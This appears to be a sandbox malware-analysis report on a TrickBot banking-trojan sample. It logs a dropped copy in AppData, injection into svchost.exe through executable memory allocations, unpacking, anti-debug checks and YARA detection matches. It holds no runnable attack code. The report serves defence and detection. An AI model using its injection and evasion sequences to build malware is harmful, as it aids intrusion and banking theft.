      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001FF0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtQueryInformationProcess,NtWriteVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,7_3_10001FF0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001880 NtFreeVirtualMemory,7_3_10001880
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001E70 NtReadVirtualMemory,NtWriteVirtualMemory,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtSignalAndWaitForSingleObject,NtClose,NtClose,7_3_10001E70
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001AE03_3_10001AE0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001FF03_3_10001FF0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400029006_2_0000000140002900
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400128206_2_0000000140012820
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400038606_2_0000000140003860
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400140806_2_0000000140014080
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000E0C06_2_000000014000E0C0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140013CD06_2_0000000140013CD0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000F8D06_2_000000014000F8D0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000E6D06_2_000000014000E6D0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000F3106_2_000000014000F310
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400153406_2_0000000140015340
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_00000001400179C06_2_00000001400179C0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001AE07_3_10001AE0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001FF07_3_10001FF0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400029008_2_0000000140002900
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400128208_2_0000000140012820
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400038608_2_0000000140003860
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400140808_2_0000000140014080
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000E0C08_2_000000014000E0C0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_0000000140013CD08_2_0000000140013CD0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000F8D08_2_000000014000F8D0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000E6D08_2_000000014000E6D0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000F3108_2_000000014000F310
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400153408_2_0000000140015340
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_00000001400179C08_2_00000001400179C0
      Source: 55ryoipjfdr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 6.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: 8.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trickbot hash1 = 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c, author = JPCERT/CC Incident Response Group, description = detect TrickBot in memory, rule_usage = memory scan
      Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trickbot hash1 = 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c, author = JPCERT/CC Incident Response Group, description = detect TrickBot in memory, rule_usage = memory scan
      Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 reference_sample = 5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172, os = windows, severity = x86, creation_date = 2021-03-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Trickbot, fingerprint = 98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191, id = 01365e46-c769-4c6e-913a-4d1e42948af2, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@8/4@1/22
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140002900 SetCurrentDirectoryW,GetTickCount,srand,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,??2@YAPEAX_K@Z,HeapFree,HeapFree,_time64,_time64,Sleep,??2@YAPEAX_K@Z,HeapFree,_time64,??3@YAXPEAX@Z,HeapFree,Sleep,_time64,HeapFree,_time64,_wtoi,_wtoi,HeapFree,HeapFree,HeapFree,FreeLibrary,CoUninitialize,6_2_0000000140002900
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_0040197E FindResourceW,LoadResource,LockResource,SizeofResource,0_2_0040197E
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeFile created: C:\Users\user\AppData\Roaming\winappJump to behavior
      Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\VLock
      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\VLock
      Source: 55ryoipjfdr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 55ryoipjfdr.exeVirustotal: Detection: 90%
      Source: 55ryoipjfdr.exeReversingLabs: Detection: 94%
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeFile read: C:\Users\user\Desktop\55ryoipjfdr.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\55ryoipjfdr.exe "C:\Users\user\Desktop\55ryoipjfdr.exe"
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeProcess created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeProcess created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcsJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcsJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: authz.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: gqrotepg.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: remotepg.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: regapi.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: authz.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: gqrotepg.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: remotepg.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: regapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: authz.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: gqrotepg.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: remotepg.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: regapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: 55ryoipjfdr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeUnpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeUnpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,0_2_00401A00

      Persistence and Installation Behavior

      barindex
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1984, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeFile created: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeJump to dropped file

      Boot Survival

      barindex
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1984, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000C3F0 LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000C3F0

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD304
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD6E4
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA04
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD244
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD2E4
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD6C4
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD424
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE654
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD784
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD744
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD3C4
      Source: C:\Windows\System32\svchost.exeCode function: HeapFree,GetAdaptersInfo,HeapFree,HeapFree,8_2_000000014000A230
      Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-8785
      Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000D0F0 HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,FindNextFileW,GetLastError,8_2_000000014000D0F0
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_000000014000C0C0 GetProcAddress,GetSystemInfo,6_2_000000014000C0C0
      Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124@%SystemRoot%\System32\ci.dll,-100Hyper-V RAWDDDD
      Source: svchost.exe, 00000008.00000002.2670682517.00000159F2A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000008.00000002.2670494241.00000159F2A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@f
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001020 LdrLoadDll,LdrLoadDll,3_3_10001020
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,0_2_00401A00
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_0040116E mov eax, dword ptr fs:[00000030h]0_2_0040116E
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_004C007E push dword ptr fs:[00000030h]0_2_004C007E
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_004C03BB push dword ptr fs:[00000030h]0_2_004C03BB
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_004D007E push dword ptr fs:[00000030h]0_2_004D007E
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_004D03BB push dword ptr fs:[00000030h]0_2_004D03BB
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_2_007B03BB push dword ptr fs:[00000030h]3_2_007B03BB
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_2_007B007E push dword ptr fs:[00000030h]3_2_007B007E
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_2_007C007E push dword ptr fs:[00000030h]3_2_007C007E
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_2_007C03BB push dword ptr fs:[00000030h]3_2_007C03BB
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_2_006B03BB push dword ptr fs:[00000030h]7_2_006B03BB
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_2_006B007E push dword ptr fs:[00000030h]7_2_006B007E
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_2_006C007E push dword ptr fs:[00000030h]7_2_006C007E
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_2_006C03BB push dword ptr fs:[00000030h]7_2_006C03BB
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_00402200 GetProcessHeap,RtlFreeHeap,0_2_00402200
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140018520 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140018520
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140018168 SetUnhandledExceptionFilter,6_2_0000000140018168
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_0000000140018168 SetUnhandledExceptionFilter,8_2_0000000140018168
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_0000000140018520 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0000000140018520

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EE20000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EE30000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140001000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140019000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140020000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140021000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140023000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF50000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
